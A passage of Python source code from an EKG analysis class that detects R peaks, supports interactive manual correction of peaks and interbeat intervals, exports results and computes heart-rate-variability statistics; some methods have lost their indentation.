if detect_peaks == True:
if pan_tompkins == True:
self.metadata['analysis_info']['mw_size'] = 'N/A'
self.metadata['analysis_info']['upshift'] = 'N/A'
self.metadata['analysis_info']['rms_align'] = 'N/A'
self.pan_tompkins_detector()
# detect R peaks & calculate inter-beat intevals
else:
self.calc_RR(smooth, mw_size, upshift, rms_align)
self.metadata['analysis_info']['pan_tompkins'] = False
# initialize the nn object
self.nn = self.rr
register_matplotlib_converters()
def load_ekg(self, min_dur):
"""
Load EKG data from csv file and extract metadata including sampling frequency, cycle length, start time and NaN data.
Parameters
----------
min_dur : bool, default True
If set to True, will not load files shorter than the minimum duration length of 5 minutes.
"""
data = pd.read_csv(self.metadata['file_info']['path'], header = [0, 1], index_col = 0, parse_dates=True)['EKG']
# Check cycle length against 5 minute duration minimum
cycle_len_secs = (data.index[-1] - data.index[0]).total_seconds()
if cycle_len_secs < 60*5-1:
if min_dur == True:
print('Data is shorter than minimum duration. Cycle will not be loaded.')
print('--> To load data, set min_dur to False')
return
else:
print('* WARNING: Data is shorter than 5 minutes.')
self.data = data
else:
self.data = data
diff = data.index.to_series().diff()[1:2]
s_freq = 1000000/diff[0].microseconds
nans = len(data) - data['Raw'].count()
# Set metadata
self.metadata['file_info']['start_time'] = data.index[0]
self.metadata['analysis_info'] = {'s_freq': s_freq, 'cycle_len_secs': cycle_len_secs,
'NaNs(samples)': nans, 'NaNs(secs)': nans/s_freq}
print('EKG successfully imported.')
def rms_smooth(self, sm_wn):
"""
Smooth raw data with root mean square (RMS) moving window.
Reduce noise leading to false R peak detections.
Parameters
----------
sm_wn : float, default 30
Size of moving window for RMS smoothing preprocessing (ms).
"""
self.metadata['analysis_info']['smooth'] = True
self.metadata['analysis_info']['rms_smooth_wn'] = sm_wn
mw = int((sm_wn/1000)*self.metadata['analysis_info']['s_freq'])
self.data['raw_smooth'] = self.data.Raw.rolling(mw, center=True).mean()
    def set_Rthres(self, smooth, mw_size, upshift, rms_align):
        """
        Set R peak detection threshold based on moving average shifted up by a percentage of the EKG signal.

        Inserts an 'EKG_thres' column into self.data at position 1.

        Parameters
        ----------
        smooth : bool
            If set to True, the moving average is computed over the smoothed
            signal ('raw_smooth') instead of 'Raw'.
        mw_size : float
            Time over which the moving average of the EKG signal will be taken to calculate the R peak detection threshold (ms).
        upshift : float
            Percentage of EKG signal that the moving average will be shifted up by to set the R peak detection threshold.
        rms_align: str
            whether to align the mean to the right or left side of the moving window [options: 'right', 'left']

        See Also
        --------
        EKG.rms_smooth : Smooth raw EKG data with root mean square (RMS) moving window.
        """
        print('Calculating moving average with {} ms window and a {}% upshift...'.format(mw_size, upshift))
        
        # convert moving window to sample & calc moving average over window
        mw = int((mw_size/1000)*self.metadata['analysis_info']['s_freq'])
        #if smooth is true have the moving average calculated based off of smoothed data
        if smooth == False:
            mavg = self.data.Raw.rolling(mw).mean()
            ekg_avg = np.mean(self.data['Raw'])
        elif smooth == True:
            mavg = self.data.raw_smooth.rolling(mw).mean()
            ekg_avg = np.mean(self.data['raw_smooth'])

        if rms_align == 'left':
            # get the number of NaNs and shift the average left by that amount
            mavg = mavg.shift(-mavg.isna().sum())
        # replace edge nans with overall average
        mavg = mavg.fillna(ekg_avg)

        # set detection threshold as +upshift% of moving average
        # (adding |mavg|*perc keeps the shift upward even where the baseline is negative)
        upshift_perc = upshift/100
        det_thres = mavg + np.abs(mavg*upshift_perc)
        # insert threshold column at consistent position in df to ensure same color for plotting regardless of smoothing
        # NOTE(review): DataFrame.insert raises if 'EKG_thres' already exists,
        # so this method is not safe to call twice on the same object — confirm
        self.data.insert(1, 'EKG_thres', det_thres) # can remove this for speed, just keep as series

        #set metadata
        self.metadata['analysis_info']['mw_size'] = mw_size
        self.metadata['analysis_info']['upshift'] = upshift
        self.metadata['analysis_info']['rms_align'] = rms_align
def detect_Rpeaks(self, smooth):
"""
Detect R peaks of raw or smoothed EKG signal based on detection threshold.
Parameters
----------
smooth : bool, default False
If set to True, raw EKG data is smoothed using a RMS smoothing window.
See Also
--------
EKG.rms_smooth : Smooth raw EKG data with root mean square (RMS) moving window
EKG.set_Rthres : Set R peak detection threshold based on moving average shifted up by a percentage of the EKG signal.
"""
print('Detecting R peaks...')
#Use the raw data or smoothed data depending on bool smooth
if smooth == False:
raw = pd.Series(self.data['Raw'])
elif smooth == True:
raw = pd.Series(self.data['raw_smooth'])
thres = pd.Series(self.data['EKG_thres'])
#create empty peaks list
peaks = []
x = 0
#Within the length of the data if the value of raw data (could be smoothed raw data) is less than ekg threshold keep counting forwards
while x < len(raw):
if raw[x] > thres[x]:
roi_start = x
# count forwards to find down-crossing
for h in range(x, len(raw), 1):
# if value drops below threshold, end ROI
if raw[h] < thres[h]:
roi_end = h
break
# else if data ends before dropping below threshold, leave ROI open
# & advance h pointer to end loop
elif (raw[h] >= thres[h]) and (h == len(raw)-1):
roi_end = None
h += 1
break
# if ROI is closed, get maximum between roi_start and roi_end
if roi_end:
peak = raw[x:h].idxmax()
peaks.append(peak)
# advance the pointer
x = h
else:
x += 1
self.rpeaks = raw[peaks]
print('R peak detection complete')
# get time between peaks and convert to mseconds
self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
# create rpeaks dataframe and add ibi columm
rpeaks_df = pd.DataFrame(self.rpeaks)
ibi = np.insert(self.rr, 0, np.NaN)
rpeaks_df['ibi_ms'] = ibi
self.rpeaks_df = rpeaks_df
print('R-R intervals calculated')
    def rm_peak(self, time):
        """ 
        Examine a second of interest and manually remove artifact R peaks.
        
        Prompts on stdin for the ids of the peaks to remove, then recalculates
        the interbeat intervals.

        Parameters
        ----------
        time: str {'hh:mm:ss'}
            Time in the format specified dictating the second containing the peak of interest.
        
        Modifies
        -------
        self.rpeaks : Peaks that have been removed are removed from attribute.
        self.rpeaks_df : Peaks that have been removed are removed from attribute.
        self.rpeak_artifacts : Removed peaks added to attribute.
        self.rr, self.nn : IBI values recalculated to reflect the removal.
        """
        
        # print all rpeaks in the second of interest
        peak_idxlist = {}
        peak_num = 1
        h, m, s = time.split(':')
        print('id', '\t', 'time', '\t\t\t\t', 'ibi_ms')
        for i, x in enumerate(self.rpeaks_df.index):
            if x.hour == int(h) and x.minute == int(m) and x.second == int(s):
                peak_idxlist[peak_num] = x
                print(peak_num, '\t', x, '\t', self.rpeaks_df['ibi_ms'].loc[x])
                peak_num += 1

        # specify the peak to remove
        rm_peak = input('Rpeaks to remove [list ids or None]: ')
        print('\n')
        if rm_peak == 'None':
            print('No peaks removed.')
            return
        else:
            rm_peaks = rm_peak.split(',')
            rm_peaks = [int(x) for x in rm_peaks]
            for p in rm_peaks:
                peak_to_rm = pd.Series(self.rpeaks[peak_idxlist[p]])
                peak_to_rm.index = [peak_idxlist[p]]

                # add peak to rpeak_artifacts list
                # NOTE(review): Series.append was removed in pandas 2.0 — this
                # module assumes pandas < 2; confirm the pinned version
                self.rpeak_artifacts = self.rpeak_artifacts.append(peak_to_rm)
                self.rpeak_artifacts.sort_index(inplace=True)

                # remove peak from rpeaks list & rpeaks dataframe
                self.rpeaks.drop(peak_idxlist[p], inplace=True)
                self.rpeaks_df.drop(peak_idxlist[p], inplace=True)
                print('R peak at ', peak_to_rm.index[0], ' successfully removed.')

            # recalculate ibi values
            self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
            ibi = np.insert(self.rr, 0, np.NaN)
            self.rpeaks_df['ibi_ms'] = ibi
            print('ibi values recalculated.')

        # refresh nn values
        self.nn = self.rr
    def undo_rm_peak(self, time):
        """
        Manually add back incorrectly removed peaks from EKG.rm_peak method.
        
        Prompts on stdin for the ids of the removed peaks to restore, then
        recalculates the interbeat intervals.

        Parameters
        ----------
        time : str {'hh:mm:ss'}
            Second of incorrectly removed R peak.

        Notes
        -----
        This is strictly an "undo" method. It is NOT equivalent to add_peaks().

        Modifies
        -------
        self.rpeaks : Incorrectly removed R peaks added back.
        self.rpeaks_df : Incorrectly removed R peaks added back.
        self.rr : IBI values recalculated to reflect change in R peaks.
        self.nn : IBI values recalculated to reflect change in R peaks.
        self.rpeak_artifacts : Incorrectly removed R peaks removed from attribute.

        See Also
        --------
        EKG.rm_peak : Examine a second of interest and manually remove artifact R peaks.
        EKG.add_peak : Examine a second of interest and manually add missed R peaks.
        EKG.undo_add_peak : Manually remove incorrectly added peaks from EKG.add_peak method.
        """
        
        if len(self.rpeak_artifacts) == 0:
            print('No rpeaks have been removed.')
            return
        
        # print all rpeaks in the second of interest
        peak_idxlist = {}
        peak_num = 1
        h, m, s = time.split(':')
        print('id', '\t', 'time')
        for i, x in enumerate(self.rpeak_artifacts.index):
            if x.hour == int(h) and x.minute == int(m) and x.second == int(s):
                peak_idxlist[peak_num] = x
                print(peak_num, '\t', x)
                peak_num += 1

        # specify the peak to add back
        add_peak = input('Removed Rpeaks to add back [list ids or None]: ')
        print('\n')
        if add_peak == 'None':
            print('No peaks added.')
            return
        else:
            add_peaks = add_peak.split(',')
            add_peaks = [int(x) for x in add_peaks]
            for p in add_peaks:
                peak_to_add = pd.Series(self.rpeak_artifacts[peak_idxlist[p]])
                peak_to_add.index = [peak_idxlist[p]]

                # remove peak from rpeak_artifacts list
                self.rpeak_artifacts.drop(labels=peak_to_add.index, inplace=True)

                # add peak back to rpeaks list
                # NOTE(review): Series.append was removed in pandas 2.0 — this
                # module assumes pandas < 2; confirm the pinned version
                self.rpeaks = self.rpeaks.append(peak_to_add)
                self.rpeaks.sort_index(inplace=True)

                # add peak back to rpeaks_df (ibi_ms recalculated for all rows below)
                self.rpeaks_df.loc[peak_to_add.index[0]] = [peak_to_add[0], np.NaN]
                self.rpeaks_df.sort_index(inplace=True)
                print('Rpeak at ', peak_to_add.index[0], ' successfully replaced.')

            # recalculate ibi values
            self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
            ibi = np.insert(self.rr, 0, np.NaN)
            self.rpeaks_df['ibi_ms'] = ibi
            print('ibi values recalculated.')

        # refresh nn values
        self.nn = self.rr
    def add_peak(self, time):
        """
        Examine a second of interest and manually add missed R peaks.
        
        Prompts on stdin for a millisecond range within the given second; the
        maximum of the (raw or smoothed) signal inside that range becomes the
        new R peak.

        Parameters
        ----------
        time : str {'hh:mm:ss'}
            Second within which peak is to be added.
        
        Modifies
        -------
        self.rpeaks : Added peaks added to attribute.
        self.rpeaks_df : Added peaks added to attribute.
        self.rr : IBI values recalculate to reflect changed R peaks.
        self.nn : IBI values recalculate to reflect changed R peaks.
        self.rpeaks_added : Added peaks stored.

        See Also
        --------
        EKG.undo_add_peak : Manually add back incorrectly added R peaks from EKG.add_peak method.
        EKG.rm_peak : Examine a second of interest and manually remove artifact R peak.
        EKG.undo_rm_peak : Manually add back incorrectly removed R peaks from EKG.rm_peak method.
        """
        
        # specify time range of missed peak
        h, m, s = time.split(':')
        us_rng = input('Millisecond range of missed peak [min:max]: ').split(':')
        # add zeros bc datetime microsecond precision goes to 6 figures
        us_min, us_max = us_rng[0] + '000', us_rng[1] + '000'

        # set region of interest for new peak
        ## can modify this to include smoothing if needed
        roi = []
        for x in self.data.index:
            if x.hour == int(h) and x.minute == int(m) and x.second == int(s) and x.microsecond >= int(us_min) and x.microsecond <= int(us_max):
                roi.append(x)

        # define new rpeak as the signal maximum within the region of interest
        if self.metadata['analysis_info']['smooth'] == False:
            peak_idx = self.data.loc[roi]['Raw'].idxmax()
            peak_val = self.data['Raw'].loc[peak_idx]
            new_peak = pd.Series(peak_val, [peak_idx])
        if self.metadata['analysis_info']['smooth'] == True:
            peak_idx = self.data.loc[roi]['raw_smooth'].idxmax()
            peak_val = self.data['raw_smooth'].loc[peak_idx]
            new_peak = pd.Series(peak_val, [peak_idx])

        # add peak to rpeaks list
        # NOTE(review): Series.append was removed in pandas 2.0 — this module
        # assumes pandas < 2; confirm the pinned version
        self.rpeaks = self.rpeaks.append(new_peak)
        self.rpeaks.sort_index(inplace=True)

        # add peak to rpeaks_df (ibi_ms recalculated for all rows below)
        self.rpeaks_df.loc[peak_idx] = [peak_val, np.NaN]
        self.rpeaks_df.sort_index(inplace=True)

        # add peak to rpeaks_added list
        self.rpeaks_added = self.rpeaks_added.append(new_peak)
        self.rpeaks_added.sort_index(inplace=True)
        print('New peak added.')

        # recalculate ibi values
        self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
        ibi = np.insert(self.rr, 0, np.NaN)
        self.rpeaks_df['ibi_ms'] = ibi
        print('ibi values recalculated.')

        # refresh nn values
        self.nn = self.rr
    def undo_add_peak(self, time):
        """
        Manually remove incorrectly added peaks from EKG.add_peak method.
       
        Prompts on stdin for the ids of the added peaks to remove, then
        recalculates the interbeat intervals.

        Parameters
        ----------
        time : str {'hh:mm:ss'}
            Second of incorrectly added R peak.

        Modifies
        -------
        self.rpeaks : Incorrectly added R peaks removed.
        self.rpeaks_df : Incorrectly added R peaks removed.
        self.rr : IBI values recalculated to reflect change in R peaks.
        self.nn : IBI values recalculated to reflect change in R peaks.
        self.rpeaks_added : Incorrectly added R peaks removed from attribute.

        Notes
        -----
        This is strictly an "undo" method. It is NOT equivalent to EKG.rm_peak.

        See Also
        --------
        EKG.add_peak : Examine a second of interest and manually add missed R peaks.
        EKG.rm_peak : Examine a second of interest and manually remove artifact R peaks.
        EKG.undo_rm_peak : Manually add back incorrectly removed peaks from EKG.rm_peak method.
        """
        
        if len(self.rpeaks_added) == 0:
            print('No rpeaks have been added.')
            return
        
        # print all rpeaks in the second of interest
        peak_idxlist = {}
        peak_num = 1
        h, m, s = time.split(':')
        print('id', '\t', 'time')
        for i, x in enumerate(self.rpeaks_added.index):
            if x.hour == int(h) and x.minute == int(m) and x.second == int(s):
                peak_idxlist[peak_num] = x
                print(peak_num, '\t', x)
                peak_num += 1

        # specify the peak to remove
        rm_peak = input('Added Rpeaks to remove [list ids or None]: ')
        print('\n')
        if rm_peak == 'None':
            print('No peaks removed.')
            return
        else:
            rm_peaks = rm_peak.split(',')
            rm_peaks = [int(x) for x in rm_peaks]
            for p in rm_peaks:
                peak_to_rm = pd.Series(self.rpeaks_added[peak_idxlist[p]])
                peak_to_rm.index = [peak_idxlist[p]]

                # remove peak from rpeaks_added list
                self.rpeaks_added.drop(labels=peak_to_rm.index, inplace=True)

                # remove peak from rpeaks list & rpeaks dataframe
                self.rpeaks.drop(peak_idxlist[p], inplace=True)
                self.rpeaks_df.drop(peak_idxlist[p], inplace=True)
                print('R peak at ', peak_to_rm.index, ' successfully removed.')

            # recalculate ibi values
            self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')
            ibi = np.insert(self.rr, 0, np.NaN)
            self.rpeaks_df['ibi_ms'] = ibi
            print('ibi values recalculated.')

        # refresh nn values
        self.nn = self.rr
    def rm_ibi(self, thres = 3000):
        """
        Manually remove IBI's that can't be manually added with EKG.add_peak() method.
        
        IBIs to be removed could correspond to missing data (due to cleaning) or missed beats.
        Removed IBIs are replaced with NaN in self.nn (the peaks themselves are kept).

        Parameters
        ----------
        thres: int, default 3000
            Threshold time for automatic IBI removal (ms).

        Notes
        -----
        This step must be completed LAST, after removing any false peaks and adding any missed peaks.

        See Also
        --------
        EKG.add_peak : Manually add missed R peaks.
        """
        
        # check for extra-long IBIs & option to auto-remove
        if any(self.rpeaks_df['ibi_ms'] > thres):
            print(f'IBIs greater than {thres} milliseconds detected')
            rm = input('Automatically remove? [y/n]: ')
            
            if rm.casefold() == 'y':
                # get indices of ibis greater than threshold
                rm_idx = [i for i, x in enumerate(self.nn) if x > thres]
                # replace ibis w/ NaN
                self.nn[rm_idx] = np.NaN
                # NOTE(review): the extra 'thres' argument to format() is unused
                print('{} IBIs removed.'.format(len(rm_idx), thres))
                
                # add ibi to ibi_artifacts list
                df_idx = [x+1 for x in rm_idx] # shift indices by 1 to correspond with df indices
                ibis_rmvd = pd.Series(self.rpeaks_df['ibi_ms'].iloc[df_idx])
                # NOTE(review): Series.append was removed in pandas 2.0 — this
                # module assumes pandas < 2; confirm the pinned version
                self.ibi_artifacts = self.ibi_artifacts.append(ibis_rmvd)
                self.ibi_artifacts.sort_index(inplace=True)
                print('ibi_artifacts series updated.')

                # update rpeaks_df
                ibi = np.insert(self.nn, 0, np.NaN)
                self.rpeaks_df['ibi_ms'] = ibi
                print('R peaks dataframe updated.\n')
        
        else:
            print(f'All ibis are less than {thres} milliseconds.')

        # option to specify which IBIs to remove
        rm = input('Manually remove IBIs? [y/n]: ')
        if rm.casefold() == 'n':
            print('Done.')
            return
        elif rm.casefold() == 'y':
            # print IBI list w/ IDs
            print('Printing IBI list...\n')
            print('ID', '\t', 'ibi end time', '\t', 'ibi_ms')
            for i, x in enumerate(self.rpeaks_df.index[1:]):
                    print(i, '\t',str(x)[11:-3], '\t', self.rpeaks_df['ibi_ms'].loc[x])
            rm_ids = input('IDs to remove [list or None]: ')
            if rm_ids.casefold() == 'none':
                print('No ibis removed.')
                return
            else:
                # replace IBIs in nn array
                rm_ids = [int(x) for x in rm_ids.split(',')]
                self.nn[rm_ids] = np.NaN
                print('{} IBIs removed.'.format(len(rm_ids)))
                
                # add ibi to ibi_artifacts list
                df_idx = [x+1 for x in rm_ids] # shift indices by 1 to correspond with df indices
                ibis_rmvd = pd.Series(self.rpeaks_df['ibi_ms'].iloc[df_idx])
                self.ibi_artifacts = self.ibi_artifacts.append(ibis_rmvd)
                self.ibi_artifacts.sort_index(inplace=True)
                print('ibi_artifacts series updated.')
                
                # update self.rpeaks_df
                ibi = np.insert(self.nn, 0, np.NaN)
                self.rpeaks_df['ibi_ms'] = ibi
                print('R peaks dataframe updated.\nDone.')
    def calc_RR(self, smooth, mw_size, upshift, rms_align):
        """
        Set R peak detection threshold, detect R peaks and calculate R-R intervals.
        
        Convenience wrapper: runs EKG.set_Rthres followed by EKG.detect_Rpeaks.

        Parameters
        ----------
        smooth : bool
            If set to True, the smoothed signal is used for thresholding and detection.
        mw_size : float
            Time over which the moving average of the EKG signal will be taken to calculate the R peak detection threshold (ms).
        upshift : float
            Percentage of EKG signal that the moving average will be shifted up by to set the R peak detection threshold.
        rms_align: str
            Whether to align the mean to the right or left side of the moving window [options: 'right', 'left']

        See Also
        --------
        EKG.set_Rthres : Set R peak detection threshold based on moving average shifted up by a percentage of the EKG signal.
        EKG.detect_Rpeaks : Detect R peaks of raw or smoothed EKG signal based on detection threshold.
        EKG.pan_tompkins_detector : Use the Pan Tompkins algorithm to detect R peaks and calculate R-R intervals.
        """
        # set R peak detection parameters
        self.set_Rthres(smooth, mw_size, upshift, rms_align)
        # detect R peaks & make RR tachogram
        self.detect_Rpeaks(smooth)
    def pan_tompkins_detector(self):
        """
        Use the Pan Tompkins algorithm to detect R peaks and calculate R-R intervals.

        Sets self.rpeaks, self.rr and self.rpeaks_df.

        Jiapu Pan and Willis J. Tompkins.
        A Real-Time QRS Detection Algorithm. 
        In: IEEE Transactions on Biomedical Engineering 
        BME-32.3 (1985), pp. 230-236.

        Notes
        -----
        Relies on private (underscore-prefixed) helpers of the
        biosignalsnotebooks package; their signatures may change between
        releases — confirm against the pinned bsnb version.

        See Also
        ----------
        EKG.calc_RR : Set R peak detection threshold, detect R peaks and calculate R-R intervals.
        """
        self.metadata['analysis_info']['pan_tompkins'] = True
        #interpolate data because has NaNs, cant for ecg band pass filter step
        data = self.data.interpolate()
        #makes our data a list because that is the format that bsnb wants it in
        signal = pd.Series.tolist(data['Raw'])

        # get sample rate 
        # must be an int
        sr = int(self.metadata['analysis_info']['s_freq'])

        filtered_signal = bsnb.detect._ecg_band_pass_filter(signal, sr) #Step 1 of Pan-Tompkins Algorithm - ECG Filtering (Bandpass between 5 and 15 Hz)
        differentiated_signal = diff(filtered_signal)
        squared_signal = differentiated_signal * differentiated_signal
        # moving-window integration over an 80 ms window
        nbr_sampls_int_wind = int(0.080 * sr)
        # Initialisation of the variable that will contain the integrated signal samples
        integrated_signal = zeros_like(squared_signal)
        cumulative_sum = squared_signal.cumsum()
        integrated_signal[nbr_sampls_int_wind:] = (cumulative_sum[nbr_sampls_int_wind:] - cumulative_sum[:-nbr_sampls_int_wind]) / nbr_sampls_int_wind
        integrated_signal[:nbr_sampls_int_wind] = cumulative_sum[:nbr_sampls_int_wind] / arange(1, nbr_sampls_int_wind + 1)

        #R peak detection algorithm
        rr_buffer, signal_peak_1, noise_peak_1, threshold = bsnb.detect._buffer_ini(integrated_signal, sr)
        probable_peaks, possible_peaks= bsnb.detect._detects_peaks(integrated_signal, sr)
        #Identification of definitive R peaks
        definitive_peaks = bsnb.detect._checkup(probable_peaks, integrated_signal, sr, rr_buffer, signal_peak_1, noise_peak_1, threshold)

        # Conversion to integer type.
        definitive_peaks = array(list(map(int, definitive_peaks)))

        #Correcting step
        #Due to the multiple pre-processing stages there is a small lag in the determined peak positions, which needs to be corrected !
        # shift peaks back by 30 ms (expressed in samples) to compensate filter delay
        definitive_peaks_rephase = np.array(definitive_peaks) - 30 * (sr / 1000)
        definitive_peaks_rephase = list(map(int, definitive_peaks_rephase))
        
        #make peaks list
        index = data.index[definitive_peaks_rephase]
        values = np.array(signal)[definitive_peaks_rephase]
        self.rpeaks = pd.Series(values, index = index)
        print('R peak detection complete')

        # get time between peaks and convert to mseconds
        self.rr = np.diff(self.rpeaks.index)/np.timedelta64(1, 'ms')

        # create rpeaks dataframe and add ibi columm
        rpeaks_df = pd.DataFrame(self.rpeaks)
        ibi = np.insert(self.rr, 0, np.NaN)
        rpeaks_df['ibi_ms'] = ibi
        self.rpeaks_df = rpeaks_df
        print('R-R intervals calculated')
    def export_RR(self, savedir):
        """
        Export R peaks and RR interval data to .txt files.

        Includes list of R peaks artifacts, R peaks added, R peaks detected, IBI artifacts, RR intervals and NN intervals.
        Output filenames are derived from the source filename stem. Prompts on
        stdin when savedir is None or missing.

        Parameters
        ----------
        savedir : str
            Path to directory where .txt files will be saved. If None, the
            current working directory is offered interactively.

        See Also
        --------
        EKG.calc_RR : Set R peak detection threshold, detect R peaks and calculate R-R intervals.
        EKG.rm_ibi : Manually remove IBI's that can't be manually added with EKG.add_peak() method.
        EKG.add_peak : Manually add missed R peak.
        EKG.rm_peak : Examine a second of interest and manually remove artifact R peaks.
        """
        
        # set save directory
        if savedir is None:
            savedir = os.getcwd()
            chngdir = input('Files will be saved to ' + savedir + '. Change save directory? [Y/N] ')
            if chngdir == 'Y':
                savedir = input('New save directory: ')
                if not os.path.exists(savedir):
                    createdir = input(savedir + ' does not exist. Create directory? [Y/N] ')
                    if createdir == 'Y':
                        os.makedirs(savedir)
                    else:
                        savedir = input('Try again. Save directory: ')
                        if not os.path.exists(savedir):
                            print(savedir + ' does not exist. Aborting. ')
                            return
        elif not os.path.exists(savedir):
            print(savedir + ' does not exist. Creating directory...')
            os.makedirs(savedir)
        else:
            print('Files will be saved to ' + savedir)
        
        # save rpeak_artifacts list
        try:
            self.rpeak_artifacts
        except AttributeError:
            cont = input('EKG object has no artifacts attribute. Continue save without cleaning? [y/n]: ')
            if cont == 'y':
                pass
            elif cont == 'n':
                print('Save aborted.')
                return
        else:
            savearts = self.metadata['file_info']['fname'].split('.')[0] + '_rpeak_artifacts.txt'
            art_file = os.path.join(savedir, savearts)
            self.rpeak_artifacts.to_csv(art_file, header=False)
            print('R peak artifacts exported.')

        # save rpeaks_added list
        savename = self.metadata['file_info']['fname'].split('.')[0] + '_rpeaks_added.txt'
        savefile = os.path.join(savedir, savename)
        self.rpeaks_added.to_csv(savefile, header=False)
        print('R peak additions exported.')

        # save R peak detections
        savepeaks = self.metadata['file_info']['fname'].split('.')[0] + '_rpeaks.txt'
        peaks_file = os.path.join(savedir, savepeaks)
        self.rpeaks.to_csv(peaks_file, header=False)
        print('R peaks exported.')

        # save ibi_artifact list
        savename = self.metadata['file_info']['fname'].split('.')[0] + '_ibi_artifacts.txt'
        savefile = os.path.join(savedir, savename)
        self.ibi_artifacts.to_csv(savefile, header=False)
        print('IBI artifacts exported.')

        # save RR intervals
        # NOTE(review): assumes metadata['analysis_info']['pan_tompkins'] exists,
        # i.e. __init__ ran with detect_peaks=True — confirm for other call paths
        if self.metadata['analysis_info']['pan_tompkins'] == False:
            rr_header = 'R peak detection mw_size = {} & upshift = {}'.format(self.metadata['analysis_info']['mw_size'], self.metadata['analysis_info']['upshift'])
        else: 
            rr_header = 'R peak detection using the Pan Tompkins algorithm'
        saverr = self.metadata['file_info']['fname'].split('.')[0] + '_rr.txt'
        rr_file = os.path.join(savedir, saverr)
        np.savetxt(rr_file, self.rr, header=rr_header, fmt='%.0f', delimiter='\n')
        print('rr intervals exported.')

        # save NN intervals, if exists
        try: 
            self.nn
        except AttributeError:
            print('EKG object has no nn attribute. Only exporting r peaks and rr intervals.')
            pass
        else:
            # set # of artifacts removed for header
            try:
                self.rpeak_artifacts
            except AttributeError:
                arts_len = 0
            else:
                arts_len = len(self.rpeak_artifacts) + len(self.ibi_artifacts)
            if self.metadata['analysis_info']['pan_tompkins'] == False:
                nn_header = 'R peak detection mw_size = {} & upshift = {}.\nTotal artifacts removed = {} ( {} false peaks + {} false ibis).'.format(self.metadata['analysis_info']['mw_size'], self.metadata['analysis_info']['upshift'], arts_len, len(self.rpeak_artifacts), len(self.ibi_artifacts))
            else:
                nn_header = 'R peak detection using the Pan Tompkins algorithm.\nTotal artifacts removed = {} ( {} false peaks + {} false ibis).'.format(arts_len, len(self.rpeak_artifacts), len(self.ibi_artifacts))
            savenn = self.metadata['file_info']['fname'].split('.')[0] + '_nn.txt'
            nn_file = os.path.join(savedir, savenn)
            np.savetxt(nn_file, self.nn, header=nn_header, fmt='%.0f', delimiter='\n')
            print('nn intervals exported.')

        print('Done.')
def calc_tstats(self, itype):
"""
Calculate commonly used time domain HRV statistics.
Time domain HRV statistics include mean, min and max HR (bpm), mean interbeat interval length, SDNN, RMSSD, pNN20 and pNN50.
SDNN is the standard deviation of normal to normal IBI. RMSSD is the root mean squared standard deviation of normal interbeat interval length.
pNN20 and pNN50 are the percentage of normal interbeat intervals that exceed 20ms and 50ms respectively.
Min and max HR is determined over 5 RR intervals.
Parameters
----------
itype : str {'rr, 'nn'}
Interval type.'rr' is uncleaned data. 'nn' is normal intervals (cleaned).
See Also
--------
EKG.hrv_stats : Calculate all HRV statistics on IBI object.
EKG.calc_fstats : Calculate frequency domain statistics.
EKG.calc_psd_welch : Calculate welch power spectrum.
EKG.calc_psd_mt : Calculate multitaper power spectrum.
EKG.calc_fbands : Calculate different frequency band measures.
"""
print('Calculating time domain statistics...')
if itype == 'rr':
ii = self.rr
ii_diff = np.diff(self.rr)
ii_diffsq = ii_diff**2
self.rr_diff = ii_diff
self.rr_diffsq = ii_diffsq
elif itype == 'nn':
# remove np.NaNs for calculations
ii = self.nn[~np.isnan(self.nn)]
ii_diff = np.diff(ii)
ii_diffsq = ii_diff**2
self.nn_diff = ii_diff
self.nn_diffsq = ii_diffsq
# heartrate in bpm
hr_avg = 60/np.mean(ii)*1000
rollmean_ii = pd.Series(ii).rolling(5).mean()
mx_ii, mn_ii = np.nanmax(rollmean_ii), np.nanmin(rollmean_ii)
hr_max = 60/mn_ii*1000
hr_min = 60/mx_ii*1000
# inter-beat interval & SD (ms)
ibi = np.mean(ii)
sdnn = np.std(ii, ddof=1)
# SD & RMS of differences between successive II intervals (ms)
sdsd = np.std(ii_diff)
rmssd = np.sqrt(np.mean(ii_diffsq))
# pNN20 & pNN50
pxx20 = sum(np.abs(ii_diff) >= 20.0)/(len(ii_diff)-1) *100
pxx50 = sum(np.abs(ii_diff) >= 50.0)/(len(ii_diff)-1) *100
self.time_stats = {'linear':{'HR_avg': hr_avg, 'HR_max': hr_max, 'HR_min': hr_min, 'IBI_mean': ibi,
'SDNN': sdnn, 'RMSSD': rmssd, 'pXX20': pxx20, 'pXX50': pxx50},
}
print('Time domain stats stored in obj.time_stats\n')
def interpolate_IBI(self, itype):
"""
Resample tachogram to original sampling frequency and interpolate for power spectral estimation.
This is done since RRs are not evenly placed.
Parameters
----------
itype : str {'rr', 'nn'}
Interval type.'rr' is uncleaned data. 'nn' is normal intervals (cleaned).
Note
----
Adapted from pyHRV
See Also
--------
EKG.calc_psd_welch : Calculate welch power spectrum.
EKG.calc_psd_mt : Calculate multitaper power spectrum.
"""
# specify data
if itype == 'rr':
ii = self.rr
elif itype == 'nn':
# remove np.NaNs for calculations
ii = self.nn[~np.isnan(self.nn)]
# interpolate
fs = self.metadata['analysis_info']['s_freq']
t = np.cumsum(ii)
t -= t[0]
f_interp = sp.interpolate.interp1d(t, ii, 'cubic')
t_interp = np.arange(t[0], t[-1], 1000./fs)
self.ii_interp = f_interp(t_interp)
self.metadata['analysis_info']['s_freq_interp'] = self.metadata['analysis_info']['s_freq']
def data_pre_processing(self, fs):
    """
    Prepare the NN series for spectral estimation.

    Linearly interpolates the NN time series onto a regular grid at the
    requested sampling frequency and removes the mean (zero centering).

    Parameters
    ----------
    fs : int
        Desired sampling frequency of the time series in Hz.

    Returns
    -------
    NN_intervals_interpolated : np.ndarray
        Interpolated and zero-centered NN series, shape (K, 1).
    K : int
        Number of samples in the interpolated series.
    """
    # drop invalid (NaN) intervals before building the time base
    valid_nn = self.nn[~np.isnan(self.nn)]
    beat_times = np.cumsum(valid_nn) / 1000  # beat times in seconds
    step = 1 / fs
    duration = np.floor(beat_times.max(0))  # observation duration (s)
    # regular time axis starting at 1 s, then linear interpolation onto it
    grid = np.arange(1.0, duration, step)
    series = np.interp(grid, beat_times, valid_nn)
    num_samples = series.shape[0]
    # zero-center prior to multi-tapering
    series = series - np.mean(series)
    return series.reshape((num_samples, 1)), num_samples
def denoised_mt_spectral_estimation(self, NN_intervals_interpolated, N, NW, no_of_tapers, K, fs):
    """
    Estimate denoised Eigen-coefficients and a denoised multitaper PSD via
